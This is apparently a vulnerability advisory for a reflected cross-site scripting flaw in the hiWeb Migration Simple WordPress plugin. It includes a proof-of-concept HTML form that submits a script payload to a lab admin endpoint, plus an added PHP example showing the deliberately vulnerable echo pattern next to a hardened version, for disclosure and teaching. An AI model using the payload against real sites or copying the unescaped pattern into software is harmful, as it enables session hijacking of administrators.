wpexploit | Shreya Pohekar | WPEX-ID: 1D4A2F0E-A371-4E27-98DE-528E070F41B0
History: Apr 12, 2023 - 12:00 a.m.

hiWeb Migration Simple <= 2.0.0.1 Reflected Cross-Site Scripting

2023-04-12 00:00:00
Shreya Pohekar
82
xss
web migration simple
admin login
cross-site scripting

EPSS: 0.0005 (Low)
Percentile: 17.0%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. The hiweb-migration-simple plugin is vulnerable to POST-based XSS on the endpoint http://172.28.128.6/wordpress/wp-admin/tools.php?page=hw_migration_simple via the POST parameter old_domain. This happens because user-supplied input is reflected on the page without proper handling.

1. Login as Admin.
2. Open the .html file in the same browser session.
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.28.128.6/wordpress/wp-admin/tools.php?page=hw_migration_simple" method="POST">
      <input type="hidden" name="old&#95;domain" value="&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="new&#95;domain" value="http&#58;&#47;&#47;qwer&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
3. XSS will be triggered.
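The following PHP is an added illustration of the pattern the advisory describes and of its remediation; it is not the hiweb-migration-simple plugin's own code, and the function names `hw_example_render_vulnerable`, `hw_example_render_hardened`, the nonce action `hw_example_migrate` and the field name `hw_example_nonce` are hypothetical. The first function echoes the submitted `old_domain` and `new_domain` values straight back into the admin page, which is exactly what lets the PoC's value become live markup. The second function uses standard WordPress APIs: a capability check, a nonce (which also rejects the cross-site form submission the PoC relies on for delivery), input sanitisation, and context-appropriate output escaping.

```php
<?php
// Added illustration, not the hiweb-migration-simple plugin's own code.
// Hypothetical handler for an admin "migrate domain" form.

// Vulnerable pattern: user input is reflected into the page unescaped, so a
// value such as <script>alert(document.domain)</script> is rendered as markup
// in the browser of whichever admin submitted (or was tricked into
// submitting) the form.
function hw_example_render_vulnerable() {
    $old = isset($_POST['old_domain']) ? $_POST['old_domain'] : '';
    $new = isset($_POST['new_domain']) ? $_POST['new_domain'] : '';

    echo '<form method="post">';
    echo '<input type="text" name="old_domain" value="' . $old . '">';
    echo '<input type="text" name="new_domain" value="' . $new . '">';
    echo '<input type="submit" value="Migrate">';
    echo '</form>';

    if ($old !== '') {
        echo '<p>Migrating from ' . $old . ' to ' . $new . '</p>';
    }
}

// Hardened pattern:
//  1. only run for users allowed to manage options (capability check),
//  2. require a WordPress nonce; check_admin_referer() dies unless the nonce
//     emitted by wp_nonce_field() for this action is present and valid, which
//     a form hosted on another origin cannot supply,
//  3. sanitise the input on the way in, and
//  4. escape on output for the context it lands in:
//     esc_attr() inside an attribute, esc_html() inside element text.
function hw_example_render_hardened() {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }

    $old = '';
    $new = '';
    if ('POST' === $_SERVER['REQUEST_METHOD']) {
        check_admin_referer('hw_example_migrate', 'hw_example_nonce');
        $old = sanitize_text_field(wp_unslash($_POST['old_domain'] ?? ''));
        $new = sanitize_text_field(wp_unslash($_POST['new_domain'] ?? ''));
    }

    echo '<form method="post">';
    wp_nonce_field('hw_example_migrate', 'hw_example_nonce');
    echo '<input type="text" name="old_domain" value="' . esc_attr($old) . '">';
    echo '<input type="text" name="new_domain" value="' . esc_attr($new) . '">';
    echo '<input type="submit" value="Migrate">';
    echo '</form>';

    if ($old !== '') {
        echo '<p>Migrating from ' . esc_html($old) . ' to ' . esc_html($new) . '</p>';
    }
}
```

Escaping must match the output context: a value placed inside a `value="..."` attribute needs `esc_attr()`, while the same value printed as element text needs `esc_html()`; sanitising on input alone is not sufficient, because `sanitize_text_field()` is not an output encoder. The nonce check is the part that neutralises the delivery shown in the PoC, since it makes the admin's own session, not just their privilege level, a requirement for the POST to be processed.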

